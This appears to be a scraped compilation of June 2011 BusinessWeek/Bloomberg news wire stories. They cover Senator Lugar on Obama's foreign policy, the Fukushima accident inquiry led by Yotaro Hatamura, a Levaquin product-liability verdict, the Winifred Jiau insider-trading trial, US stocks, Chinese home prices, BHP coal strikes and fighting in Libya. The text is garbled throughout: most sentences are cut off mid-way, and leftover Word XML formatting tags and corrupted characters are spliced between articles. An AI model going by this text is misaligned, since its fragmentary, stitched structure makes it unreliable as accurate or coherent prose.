wouldn't support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wait until after a hearing he has sought on the administration's rationale for involvement in Libya before deciding whether to support cutting off funding for the mission if the president continues refusing to seek authorization.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in Afghanistan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war in Afghanistan, Lugar embraced the idea of a reduction in U.S. forces to 20,000 or 30,000 as suggested by the president of the Council on Foreign Relations, Richard Haass, at a congressional hearing.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level of troop drawdown could probably be reached within a year,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 has started paring U.S. forces in Afghanistan, even before Obama decides on the full size of the promised reduction, by re-routing 800 soldiers that were in training for the conflict.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administration is considering how much to cut troop strength in Afghanistan to meet the president's December 2009 pledge of starting to reduce the U.S. presence there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under pressure from fellow Democrats and some Republicans for a sizable cut in the almost 100,000 U.S. forces in Afghanistan, fighting alongside 47,000 troops from other countries in the NATO-led coalition.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the administration has said that the wars in Afghanistan and Iraq are only costing $117 billion this year as opposed to $159 billion the year before, this is a disproportionate amount of the defense budget on one small country,"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said Pakistan "is a real worry" in terms of the safety and security of its nuclear weapons.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raised this question, and the Pakistanis have said this is our sovereign right to deal with this," he said. "As a matter of fact, they have felt we have been more and more intrusive and that we ought to get over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Laurie Asseo, Robin Meszoly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Dodge in Washington at cdodge1@bloomberg.net.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in Washington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Economic Policy U. S. Broadband Policy U.S. Energy Policy Obama's Healthcare Reform Foreign Direct Investment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http://www.businessweek.com/news/2011-06-18/lugar-gives-obama-at-best-mediocre-grade-for-foreign-policy.html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Failure Guru Probes Nuclear Crisis for Lessons Not Culprits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12:39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Russia, China May Sign Gas Deal Later in Year Amid Wrangling Food-Safety Fears Grow in Japan on Radiation Test Concern Libya Mission Will Violate War Powers June 19, Boehner Says Huntsman Money Made in China Tests Obama EnvoyБ─(tm)s 2012 Hopes Chevron Bets on $30 Billion Volcanoes Beneath Rainforest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Chisaki Watanabe, Shunichi Ozasa and Stuart Biggs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possible reactor restarts in seventh paragraph, search for hot spots in 21st.)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Engineering professor Yotaro Hatamura has built a career on failure.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70-year-old academic at the University of Tokyo founded the nonprofit Association for the Study of Failure in 2002, which has members including Tokyo Electric Power Co., the owner of the Fukushima plant at the center of the biggest nuclear accident since Chernobyl.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Electric is now the subject of Hatamura's next study. He was appointed by Prime Minister Naoto Kan last month as head of the 10-member team to conduct an "impartial and multifaceted" investigation into what went wrong at the Fukushima nuclear plant and how to prevent a repeat. He made a visit to the station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objectives are similar to those of U.S. President Barack Obama's commission on the BP Plc Gulf of Mexico oil spill in 2010, which in January recommended "urgent reform" of government rules and oil industry practices. The independent Fukushima investigation team has the authority to question officials at Tokyo Electric and government leaders including the prime minister.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Independent of Influence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won't be influenced by the positions of others or considerations of profit or loss," Hatamura said at the team's inaugural meeting on June 7 attended by Kan.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 also indicated his team will probe whether an earthquake-prone country such as Japan should have an energy policy built around atomic power. Because of the inherent dangers in nuclear power, it's a mistake to treat it as being "safe," he said at the meeting.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Minister Banri Kaieda today said he may allow utilities to restart nuclear generators that had been shut down for routine maintenance. There are negatives to suspending all nuclear power, he said at a press briefing in Tokyo, citing an expected "gap" in power supply and demand in Japan's coming summer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his return from Fukushima last night, Hatamura recounted a conversation with the plant's manager, Masao Yoshida. "Yoshida told me that he could not imagine that such a big tsunami could come after an earthquake," he told reporters in Tokyo. "From our discussions, I gathered that no one at the plant could imagine that such a tsunami would occur."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 declined to be interviewed for this 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Failure Database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academic, who received his Ph.D in industrial mechanical engineering from the University of Tokyo in 1973, began his work studying human error after finding his students were more interested in learning how engineering projects can go wrong, according to the publisher of his book "Learning from Failure."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Failure Knowledge Database that Hatamura set up has studied 1,175 accidents using a method that focuses on design flaws, human error and how designers fail to see future changes in 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Hatamura's database has a case study of Tokyo Electric and its falsification of nuclear plant maintenance records, which the utility known as Tepco admitted in 2002. The study concludes the faked reports resulted from lack of quality control and proper risk management. He also examined the derailment of a commuter train in Amagasaki, western Japan that killed 107 people in 2005, according to the database.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 Mistakes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Central to his research is the way machines are used over time and how designers fail to predict how the equipment will be adapted.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showed in his investigation into the death of a six- year-old boy crushed in a revolving door in the Roppongi Hills building in central Tokyo in 2004.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door technology was imported from Europe and modified before it was installed, Hatamura wrote in his study of the incident published with Komatsu Ltd. Where European designers had built the doors using aluminum to reduce weight and therefore their revolving force, the Japanese version used stainless steel to improve aesthetics and make them stronger.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‘Tacit Knowledge'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changes increased the "jamming force" of the door beyond the limit at which a human skull will crush, according to the report. The study concluded that "tacit knowledge" about the relationship between weight and revolving force was lost when the technology was imported by Japanese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"Especially when a machine is automatic, the user's lack of a sense of responsibility is leading to accidents that we did not see before," he said in his report on the incident.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Fukushima station suffered three reactor meltdowns after an earthquake and tsunami on March 11 knocked out power and backup generators, crippling its cooling systems.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disaster displaced 50,000 households in the evacuation zone because of radiation leaks. Japan in April raised the severity rating of the crisis to 7, the highest on an international scale and the same as the Chernobyl disaster.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Tepco has been criticized its slow response to the accident and publishing erroneous radiation data, while the government- run Nuclear and Industrial Safety Agency has been blamed for not ensuring the utility heeded warnings that a tsunami could overwhelm the plant's defenses.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Not Who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Municipal authorities in Fukushima City have expanded radiation monitoring to 1,045 spots, from 100 observed earlier, the Yomiuri newspaper reported today. Concern rose among local residents after reports of so-called radiation hot spots outside the government-mandated exclusion zone around the plant, according to the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Hatamura has said the Fukushima probe will focus on what went wrong and not who is responsible, he will need to convince Tepco and government officials to tell all they know.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challenge will be how much information the people concerned will be willing to disclose," said Shinichi Kamata, a professor of organization and strategy at the National Defense Academy of Japan, who serves on the safety advisory group of Japan Airlines Corp. with Hatamura.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inclusion of a former chief prosecutor, a retired chief judge and a lawyer in Hatamura's team raises concern that some investigators may want to identify individuals responsible, said Shigeru Haga, a professor of industrial psychology at Rikkyo University in Tokyo.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concerned they may hunt for suspects," said Haga, fellow member of the Japan Airlines advisory group.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Debate for Courts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members of the panel include academics, a former diplomat, a radiology specialist, a writer and the mayor of a town in Fukushima prefecture.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is responsible is a debate for the courts, said Tomoaki Iwai, a political science professor at Nihon University.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may be lawsuits for legal judgments," he said. "The purpose of this committee is to prevent an accident like this from happening again and set a safety standard for the future."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government pledged on June 7 "fundamental revision" of its nuclear safety rules and will create an independent regulator to prevent a repeat of the disaster.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national debate is needed on the "whole concept of nuclear power generation," the cornerstone of the country's energy policy after World War II, the government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Hatamura, accidents occur when the "human perception of risk" changes, he said in an East Japan Railway Co. report in 2006.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want this study into Fukushima to be something valuable 100 years from now," he said this month. "This accident not only affects Japan but also people in the rest of the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Kanoko Matsuyama, Yuki Hagiwara, Taku Kato and Yuriy Humber in Tokyo. Editors: Peter Langan, Amit Prakash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Chisaki Watanabe in Tokyo at cwatanabe5@bloomberg.net; Shunichi Ozasa in Tokyo at sozasa@bloomberg.net; Stuart Biggs in Tokyo at sbiggs3@bloomberg.net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Amit Prakash at aprakash1@bloomberg.net; Peter Langan at plangan@bloomberg.net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Nuclear Energy Business Opportunities in Crisis European Financial Crisis China's Environmental Crisis Mortgage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http://www.businessweek.com/news/2011-06-18/failure-guru-probes-nuclear-crisis-for-lessons-not-culprits.html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J&amp;J Wins Trial Over Claims Antibiotic Levaquin Caused Injuries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12:18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Facebook Plaintiff Passed Lie-Detector Test, His Lawyers Say Johnson &amp; Johnson Properly Warned of Drug Risk, Lawyer Says MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News WaMu Settlement Agreement With Shareholders Said to Collapse Credit Suisse, Deutsche Bank, Goldman, UBS in Court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Cronin Fisk and Beth Hawkins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Johnson &amp; Johnson isn't responsible for a tendon injury sustained by an 84-year-old man and properly warned of the risks posed by its antibiotic Levaquin, a Minneapolis jury decided.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Calvin Christensen, who said he ruptured the Achilles tendon in his right foot after taking the drug while hospitalized for pneumonia, sued the company and its Ortho- McNeil Pharmaceutical unit in 2007. Christensen said the companies downplayed the risks of Levaquin to boost sales of the drug.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denied any failure to warn and contended Christensen needed Levaquin to treat the pneumonia. The Minneapolis federal court jury rejected his claim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jury took a good, hard look at all the evidence and correctly concluded that Ortho-McNeil-Janssen Pharmaceuticals, Inc. acted responsibly and properly in disclosing the risks associated with this effective and life-saving medicine," James B. Irwin, a lawyer for the company, said in a statement after the verdict.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Christensen's case is the second of more than 2,500 pending claims in U.S. courts to go to trial over allegations that Levaquin caused tendon damage in patients and that the company failed to adequately disclose the risk. J&amp;J and Ortho-McNeil lost the first trial when a separate Minneapolis jury awarded $1.8 million to an 82-year-old man who ruptured both Achilles tendons.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‘Disappointed' Plaintiff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Ron Goldser, a lawyer for the plaintiff, said in a brief interview that his side is "disappointed."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trial began June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Food and Drug Administration in 2008 required an upgraded warning on tendon damage by Levaquin and similar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claimed the warning should have been enhanced earlier and that Johnson &amp; Johnson and Ortho-McNeil, now Ortho- McNeil-Janssen, targeted the elderly for drug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Levaquin label "has included warnings about tendinitis and tendon ruptures," since it was first approved by the FDA in 1996, Bill Foster, a J&amp;J spokesman, said in an e-mail before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Levaquin had U.S. sales of $1.3 billion in 2010 and $422 million in the first quarter of 2011. Levaquin, a member of a class of antibiotics called fluoroquinolones, was developed to treat serious and life-threatening infections, Foster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Millions of Prescriptions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drug has been prescribed more than 430 million times worldwide, company lawyers said in court papers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FDA in 2008 required Johnson &amp; Johnson and makers of other drugs in the class to include a so-called black box or enhanced warning on the risk of tendon ruptures. The risk was higher in patients older than 60, those taking steroids, or who have had kidney, heart or lung transplants, the FDA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J&amp;J was aware of the increased risk before adding the black box warning, Christensen said in his complaint. Regulatory officials in France, Italy and Belgium sent out so-called Dear Doctor letters of the risk of tendon injury among the elderly in 2002, Christensen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Ortho-McNeil upgraded its warning in the U.S. in 2002, adding the increased risk to patients taking steroids, particularly elderly patients, Christensen said. This wasn't enough, because Ortho-McNeil didn't send out Dear Doctor letters in the U.S. about the change and "muted" the additional warning, he said in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Label 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changed the label on its own after reviewing initial data from Europe in 2001, Irwin said yesterday in closing arguments.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how we like to see corporate America do things,"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who took the drug in May 2006, required surgery after rupturing his right Achilles tendon and was left with "permanent instability and loss of balance," according to his complaint. "Even with immobilization for long periods of time and physical therapy, the Achilles tendons in the elderly rarely fully recover," he said in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needed Levaquin to treat his pneumonia, Irwin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medicines have risks and benefits, we all know that," said Irwin said. "A huge benefit outweighs the risk of harm."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Christensen's doctor was aware of the warning of tendon ruptures on the Levaquin label, Irwin said. The doctor prescribed Levaquin to Christensen because "it was important to get him home," Irwin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lots of other drugs available for Calvin," his lawyer, Ronald Goldser, said at trial yesterday. "Did he have an alternative? Of course, he did."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Goldser played a portion of a video deposition of Christensen's doctor, Greg Clark, in his closing argument. In the deposition, Goldser asked Clark if he would have prescribed Levaquin if he knew then what he now knows about the drug.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should have considered alternatives for him," Clark replied.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failed to provide Dr. Clark complete and proper information in a manner intended to attract notice," Goldser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is Christensen v. Johnson &amp; Johnson, 07-03960, combined for trial in In re Levaquin Products Liability Litigation, 08-md-01943, U.S. District Court, District of Minnesota (Minneapolis).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Glenn Holdcraft, Fred Strasser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Cronin Fisk in Southfield, Michigan, at mcfisk@bloomberg.net; Beth Hawkins in Minneapolis at hawkins@visi.com.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Cause Related Marketing Business Lawsuits Over the Counter Derivatives Offshore Oil Drilling Mortgage-backed securities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http://www.businessweek.com/news/2011-06-18/j-j-wins-trial-over-claims-antibiotic-levaquin-caused-injuries.html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Jiau Jury Starts Weighing Charges of Hedge Fund Insider-Trading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12:19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MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News Б─≤Hedge Fund PaymastersБ─(tm) Bought Inside Tips From Jiau, U.S. Says Credit Suisse, Deutsche Bank, Goldman, UBS in Court News Ex-Nvidia Analyst Says He Passed Inside Tips to Networker Jiau SEC Nominees, FDIC Capital Rule, Broker-Dealers: Compliance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Patricia Hurtado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A federal jury in Manhattan failed to reach a verdict yesterday in the case of Winifred Jiau, a former Primary Global Research LLC consultant charged with passing illegal inside tips to hedge fund managers.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say Jiau got financial information from friends at Nvidia Corp. and Marvell Technology Group Ltd. and sold the data to Noah Freeman, a former SAC Capital Advisors LP portfolio manager, and to Samir Barai, founder of New York-based Barai Capital Management LP. Freeman testified that he and Barai paid $10,000 a month for exclusive access to Jiau.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43, of Fremont, California, is charged with securities fraud and conspiracy to commit securities fraud. If convicted, she faces as long as 25 years in prison.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denies the charges. Her lawyer, Joanna Hendon, argued in a closing statement yesterday that while her client did pass the information, it wasn't "material," meaning it wasn't something a reasonable investor would consider important in trading and it wouldn't have a bearing on the stock price.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is the first of the so-called expert networkers to go on trial since the U.S. charged at least a dozen people, including consultants and fund managers, with insider trading beginning in November. Primary Global, based in Mountain View, California, links investors with industry experts at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Jiau's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Freeman and Jason Pflaum, an analyst who worked for Barai, both pleaded guilty and testified for the prosecution. A third man who admitted being part of the scheme, Sonny Nguyen, a former Nvidia financial analyst who was a friend of Jiau's, testified that he passed confidential information about the chipmaker's quarterly earnings to her in August 2008.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yesterday rebutting Hendon's argument, Assistant U.S. Attorney David Leibowitz told the jury that Jiau's own actions belied the claim that the information she passed wasn't material.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that in May 2008, at the same time Jiau was passing Freeman and Barai Marvell earnings information before its public disclosure, Jiau bought 875 shares of Marvell stock for her own account. Jiau also purchased Nvidia stock at the same time she was passing information about that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Hendon's own client refutes what she spent more than an hour talking about yesterday," Leibowitz said. "This is evidence that the information Winifred Jiau obtained and passed was important and material."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Code Talk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Freeman told the jury that he, Barai and Jiau spoke in code. Company insiders were "cooks," money was "sugar" and inside information was "recipes,"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"Cooks are on strike now," Jiau wrote in a June 3, 2008, e-mail to Barai, which Leibowitz showed jurors yesterday. "So drop some of your extra sugar to me," she wrote. "Cooks don't talk to me without sugar."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Leibowitz also cited a message Jiau sent Barai when the portfolio manager started his new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"Same relationship meaning same amount as you were in the last job," Jiau wrote in the March 10, 2008,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costs," she wrote. "I need to pay to my 2 secured sources," Jiau continued. "They supply the actual numbers to the decimal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Leibowitz called it "devastating evidence."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afternoon, jurors asked U.S. District Judge Jed Rakoff questions about the laws on securities fraud and to re-hear testimony from Nguyen. They are to resume deliberations June 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U.S. v. Jiau, 1:11-cr-00161, U.S. District Court, Southern District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Stephen Farr, Fred Strasser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Patricia Hurtado in New York at pathurtado@bloomberg.net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Hedge Funds Funds Management Mutual Funds Investing Startup Funding Crowd Funding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http://www.businessweek.com/news/2011-06-18/jiau-jury-starts-weighing-charges-of-hedge-fund-insider-trading.html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Stocks Rise to Prevent Longest S&amp;P 500 Slump Since 2001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2011, 12:40 AM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U.S. Stocks Snap Six-Week Decline on Greece Optimism, Economy U.S. Stocks Advance on Better-Than-Estimated Economic Reports Cabot, Capital One, Pandora, Southern Union: U.S. Equity Movers U.S. Stocks Slump Amid Europe Woes as Economic Data Disappoint Aveo, Boston Scientific, Capstone Turbine: U.S. Equity Movers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Whitney Kisling and Victoria Stilwell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U.S. stocks rose for the first time in seven weeks, preventing the longest losing streaks for the Standard &amp; Poor's 500 Index and Dow Jones Industrial Average since 2001, as concern about the American economy ebbed even as the Greek debt crisis deepened.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Depot Inc., McDonald's Corp. and Microsoft Corp. advanced more than 2.4 percent this week to lead gains in the Dow after reports on jobless claims, retail sales and housing beat economist estimates. VF Corp. jumped 12 percent after agreeing to buy Timberland Co., while J.C. Penney Co. surged 15 percent after hiring an Apple Inc. vice president as its chief executive officer. Owens-Illinois Inc. fell 13 percent, the most in the S&amp;P 500, after cutting its profit-margin forecast.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&amp; Poor's 500 Index rose less than 0.1 percent to 1,271.50. It lost 6.8 percent during the six-week slump. The Dow rose 52.45 points, or 0.4 percent, to 12,004.36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dry timber from the selloff, then you get a match from the economic news and Greece, and you've got a little bit of fire going in the market," said Paul Zemsky, the New York-based head of asset allocation for ING Investment Management, which oversees $550 billion. "It's a recipe for people reevaluating, and saying, ‘If Greece makes it, stocks are kind of attractive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has declined 6.8 percent since April 29, its high for the year. This week, it came within 1 point of erasing its 2011 gain amid speculation Greece won't repay its debt, causing a shock to the global financial system. The cost of insuring the European nation's debt jumped, sending credit- default swaps to a record 2,237 points on June 16. The concern eased yesterday after German Chancellor Angela Merkel relented on her stance that bondholders should shoulder the burden of the Greek debt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Cheaper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S&amp;P 500 has curbed its rally since the bull market began on March 9, 2009, to 88 percent from as much as 102 percent, it's also led to cheaper stock valuations. The slump pushed the index to trade at less than 13 times estimated earnings, making it the cheapest it's been since August, Bloomberg data show. Earnings are forecast to climb 17 percent to $99.26 in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this week, the economic outlook had worsened, including an increase in the unemployment rate to 9.1 percent. Weakening data had pushed the Citigroup Economic Surprise Index for the U.S. as low as minus 117.2, showing that reports were missing projections by the most since January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Jobs, Housing Starts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grew more optimistic as jobless claims fell to 414,000 last week, less than the median economist estimate, according to the Labor Department. The Commerce Department said housing starts in the U.S. increased more than forecast in May, while retail sales declined less than estimated.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look at the broad picture of data on the economy, there's been some weakening, but most of the data still seems to be moving in a positive direction," said Kevin Caron, a market strategist in Florham Park, New Jersey, at Stifel Nicolaus &amp; Co, which has $115 billion in client assets. "When you look at the equity markets, there is something of an advantage to be had."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had been on track for one of the longest slumps in its history before this week. Since the New York Stock Exchange shifted to a five-day week from six in 1952, the gauge has posted one seven-week slump, in 1980, and two eight-week declines, in 1970 and 2001, according to data compiled by Bloomberg. There have been five seven-week drops for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Depot, McDonald's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Depot advanced 3.2 percent to $34.53 this week. McDonald's gained 2.7 percent to $82.52, and Microsoft increased 2.3 percent to $24.26. United Technologies Corp., which makes Pratt &amp; Whitney jet engines, gained after saying Boeing Co. will likely opt to replace its 737 jetliner. The shares rose 2.3 percent to $84.57.</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VF, the world's largest apparel maker, said it's buying hiking-boot company Timberland for about $1.8 billion, or $43 a share. The acquisition is the biggest in VF's 112-year history. Its shares advanced 12 percent, the most since March 2009, to $102.80.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of companies that have made acquisitions have beaten their benchmark indexes following a takeover announcement a majority of the time in eight of the past 12 years, according to a Bloomberg analysis of more than 3,800 transactions worldwide. The most recent three years have set records for gains. The median reaction before 2009 was a 0.2 percentage point advance over the benchmark, the data show.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Executive Quits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J.C. Penney soared 15 percent to $34.29 and rose the most in a day since 2000 on June 14. The third-largest U.S. department-store chain said Ron Johnson, who spearheaded the creation of Apple's retail chain, will become CEO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Owens-Illinois, the world's biggest maker of glass bottles, cut its second- quarter profit margin forecast because of higher costs and weaker demand in Australia. The shares dropped 13 percent to $25.58.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 In Motion Ltd. plummeted 24 percent, the most since September 2008, to $27.75. The maker of the BlackBerry smartphone forecast second- quarter revenue and profit that missed analysts' estimates and said it will cut jobs as a lack of new models prompts consumers to buy rival devices.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Corp. slumped 12 percent, the most since September 2009, to $36.35. McGraw-Hill Cos. slipped 3 percent to $39.61. The U.S. Securities and Exchange is considering fraud charges over ratings of mortgage-backed assets, the Wall Street Journal reported, citing people familiar with the matter that it didn't identify.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Materials shares lost the most among 10 S&amp;P 500 industries this week. falling 2 percent. Defensive industries accounted for three of the top four advances. Consumer staples climbed 1.2 percent as a group, while utilities increased 1 percent and telecommunications companies rallied 0.9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Nick Baker, Joanna Ossinger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Whitney Kisling in New York at wkisling@bloomberg.net; Victoria Stilwell in New York at vstilwell@bloomberg.net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Baker at nbaker7@bloomberg.net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Pay: The $3.6 Million Degree The Big Business of Synthetic Highs MBA Jobs: Post-Crisis, a Brave New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Stock Market U.S. Competitiveness U.S. Retail Sales U.S. Automakers U. S. Broadband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08:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/u-s-stocks-rise-to-prevent-longest-s-p-500-slump-since-2001.html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May Home Prices Rise in 67 of 70 Cities, Defying Curbs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10:55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New Home Prices Gain in 67 Out of 70 Cities on Year Beijing May New Home Prices Rise 2.1% From Year Ago, Agency Says Consumer Spending Fades in China Economy After Б─≤Peak DaysБ─(tm) Starwood Expects China to Be Largest Growth Market in 3 Years China Property DevelopersБ─(tm) Outlook Cut to Б─≤NegativeБ─(tm) by S&amp;P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China's home prices rose in May from a year earlier in all but three cities among 70 monitored by the government, defying efforts to control property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Housing price increases slowed in big cities such as the capital of Beijing, the national statistics bureau said in a statement on its website today. A total of 29 cities posted increases exceeding 5 percent, down from 33 cities in April, according to the government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People's Bank of China on June 14 raised banks' reserve ratio requirements for the ninth time since October as the government steps up its fight to contain inflation and curb house prices. The government said last month it will maintain curbs after intensifying measures this year with higher minimum down payments for second-home purchases and the introduction of residential property taxes in Shanghai and Chongqing.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home prices in the capital of Beijing rose 2.1 percent in May from a year earlier, while those in Shanghai climbed 1.4 percent, the statistics bureau said on its website today. The northeastern city of Dandong posted a 9.7 percent advance, the most among the 70 cities, while the tourism southern city of Sanya fell the most, declining 2.l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--Bonnie Cao. Editors: Linus Chua, Malcolm Scott.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Bloomberg News staff for this story: Bonnie Cao in Shanghai at bcao4@bloomberg.net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Andreea Papuc at apapuc1@bloomberg.net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City of London Investing in Commodities Out-of-Home Advertising China Real Estate China's Media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06:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/china-may-home-prices-rise-in-67-of-70-cities-defying-curbs.html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Beijing May New Home Prices Rise 2.1% From Year Ago, Agency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10:29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New Home Prices Gain in 67 Out of 70 Cities on Year China May Home Prices Rise in 67 of 70 Cities, Defying Curbs Consumer Spending Fades in China Economy After Б─≤Peak DaysБ─(tm) Starwood Expects China to Be Largest Growth Market in 3 Years China Property DevelopersБ─(tm) Outlook Cut to Б─≤NegativeБ─(tm) by S&amp;P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Beijing's new home prices rose 2.1 percent in May from a year earlier, the statistics bureau said on its website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home prices in Shanghai rose 1.4 percent last month compared with a year ago, the statement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Bloomberg News at rdobson4@bloomberg.net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Office 2.0 Steel Prices Sales 2.0 Market Research 2.0 Buying a Foreclosed Home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06:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/beijing-may-new-home-prices-rise-2-1-from-year-ago-agency-says.html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BHP Australia Coal Miners Hold Third Strike Before Talks Start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10:21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AustraliaБ─(tm)s Swan Says Economy Buoyed by China, India Outlook Asian Stocks Slump as Europe Crisis Deepens Amid Greek Rioting Japanese Stock Futures Fall on Greek Debt Threat, U.S. Economy Blackthorn Resources Says Zambian Mumbwa Project Remains Viable Copper Stockpiles Dropping 50% in China May Spur Imports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Tracy Withers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More than 1,000 workers at two BHP Billiton Ltd. coking coal mines in Australia staged a third day of strikes in a dispute that is disrupting production from the world's largest exporter of the steelmaking commodity.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Six-hour rolling stoppages are in place at the Goonyella Riverside and Peak Downs mines owned by BHP Billiton Mitsubishi Alliance in Queensland's Bowen Basin, Stephen Smyth, president of the Construction, Forestry, Mining and Energy Union's mining and energy division in Queensland, said by telephone today. The stoppages complete strike action involving about 3,500 workers at sites owned by BMA.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strikes may further boost coking coal prices already driven higher by supply shortages following floods in the state, Natalie Robertson, resources analyst at Australia &amp; New Zealand Banking Group Ltd. said this week. Further industrial action is possible if talks between the labor union and the company beginning June 20 breakdown.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see what sort of attitude and approach BHP bring to the table this week," said Smyth. "We'll go back to the membership and explain what's gone on, and the membership will decide whether or not we take further industrial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Labor unions in Australia are stepping up demands for wage rises and job security after rising commodity prices swelled profits at mining companies including Melbourne-based BHP. Steelmaking coal prices rose 47 percent to a record $330 a metric ton for three-month contracts starting April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earlier stoppages took place at the Saraji and Norwich Park mines on June 14 and the Gregory, Crinum and Blackwater mines on June 15.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 Premature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"BMA is strongly of the view that taking industrial action is premature given discussions are still progressing," BHP said in an e-mailed statement on June 13. The company has nothing to add to that statement, spokeswoman Kelly Quirke said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has been overwhelming for the position the union has taken," said Smyth. "The guys are well aware of the matters we're apart on because from the onset they put those issues to us to take to the bargaining table."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strike may further cut output at BHP, which reported a 14 percent decline in production last quarter after torrential rains from November to January inundated mines in Queensland, Australia's biggest exporter of the commodity. The nation's coking-coal exports plunged to 7.9 million metric tons in February, the lowest monthly volume in two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Steel Production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all the coal mined at the BMA mines, with annual capacity of 58 million tons, is shipped overseas for steel production, BMA said on its website. BMA is equally owned by BHP and Mitsubishi Development Pty. It directly employs more than 4,800 people, the website shows.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imports of coking coal are forecast to gain at an average rate of 9 percent a year to reach 73 million metric tons in 2016, according to Australian government forecasts. India may triple coking coal imports within five years to meet surging demand from steelmakers, ANZ said last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Exports of coking coal from Australia are forecast to rise 3 percent this year even after the floods, according to government forecasts. They may total 163 million tons this year compared with 159 million tons last year, the Australian Bureau of Agricultural &amp; Resource Economics and Sciences said in a March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Soraya Permatasari in Melbourne. Editors: Paul Tighe, Malcolm Scott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Tracy Withers in Wellington at twithers@bloomberg.net.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Coal Futures Coal Energy Hertz Global Holdings, Inc. Young entrepreneurship Data Mining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06:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/bhp-australia-coal-miners-hold-third-strike-before-talks-start.html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China May New Home Prices Gain in 67 Out of 70 Cities on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10:56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China May Home Prices Rise in 67 of 70 Cities, Defying Curbs Beijing May New Home Prices Rise 2.1% From Year Ago, Agency Says Consumer Spending Fades in China Economy After Б─≤Peak DaysБ─(tm) China Leading Indicator Shows Б─≤More ModerateБ─(tm) Economic Growth Starwood Expects China to Be Largest Growth Market in 3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China's May new home prices rose from a year earlier in 67 out of the 70 cities monitored by the government, the statistics bureau said on its website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Bloomberg News at jliu42@bloomberg.net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Out-of-Home Advertising City of London China Marketing New Zealand Business China Real Estate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06:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/china-may-new-home-prices-gain-in-67-out-of-70-cities-on-year.html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Qaddafi's Forces Fire Rockets at Libyan Port City of Misrata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9:24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Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli Talks Syria Regime Sends Army Into Northern Town as Residents Flee Syrians Flee Second Northern Town as Army Said to Approach Libya Mission Will Violate War Powers June 19, Boehner Says Turkey Spurns Aid as Syrian Attacks Forces More to Flee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Chris Stephen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and MET for more on Middle East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Forces loyal to Muammar Qaddafi fired rockets at the port and center of Misrata, attacking the besieged western city for the first time in weeks, as the Libyan leader said he has no intention of giving up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in an audio message aired on state television yesterday, vowed that his forces will defeat the air campaign of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want to negotiate, we are resilient even if they strike with atomic bombs," Qaddafi said. "We will provoke them to use atomic bombs, let them strike with atomic bombs."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Western and Arab leaders are demanding an end to Qaddafi's four-decade rule, and NATO aircraft are targeting his forces in a military campaign about to enter its fourth month. Qaddafi's forces attacked Misrata yesterday for the first time since government units were pushed out of the urban areas on May 12.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shelling coincided with an assault on the western outskirts of the city by infantry and artillery. Misrata's Hikma hospital reported 11 dead and 41 wounded in the attack on the forward positions. One woman was killed and two of her children injured by the government bombardment of the rebel-held city, Radio Misrata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jets yesterday flew over the city 125 miles (200 kilometers) east of the capital, Tripoli, and 23 detonations were heard beyond the rebel front line near the town of Zlitan. Reports that this was NATO bombing of government forces couldn't be confirmed.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Leaflets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dropped thousands of leaflets this week on the Libyan government front lines around Misrata. The flyers showed a picture of an Apache helicopter and threatening retaliation against any forces firing at civilian areas.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fighting has largely halted Libya's oil exports. Eni SpA said there has been no damage as far as it knows to its Libyan plants. It will take months for oil output to resume, Chief Executive Officer Paolo Scaroni said in an interview in St. Petersburg, Russia,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Crude oil dropped to the lowest level in almost four months today in New York on doubts European efforts to resolve the Greek debt crisis will succeed, spurring concern of reduced economic growth and fuel demand.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Crude oil for July delivery dropped $1.94 to $93.01 a barrel on the New York Mercantile Exchange, the lowest settlement price since Feb. 18. The move capped the biggest weekly decline in six weeks.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Envoy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envoy to Africa said Qaddafi refuses to step down, after holding talks with Libyan government officials in Tripoli.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prime minister said Qaddafi doesn't intend to resign," Mikhail Margelov said yesterday by telephone from Tunis, a day after meeting with Libyan officials including Prime Minister Baghdadi Mahmudi. "For the government of Tripoli, they aren't prepared to discuss the future of Qaddafi."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Margelov said Mahmudi assured him the government is in direct contact with the rebels. Abdel Hafiz Ghoga, vice president of the rebel National Transitional Council, denied any direct contact with Qaddafi officials, according to a report yesterday by Russian news service RIA Novosti.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Margelov, who earlier this month held talks with rebels in the eastern port city of Benghazi, said there need to be "clear rules of the game" to achieve a handover of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Caroline Alexander in London, Henry Meyer in Moscow, Mark Shenk in New York, Alessandra Migliaccio in Rome, Nadeem Hamid in Washington and Paul Tighe in Sydney. Editors: Terry Atlas,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Andrew J. Barden at barden@bloomberg.net;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City of London College of Business at Illinois Terry College of Business AT&amp;T NYU Stern School of Business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05:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
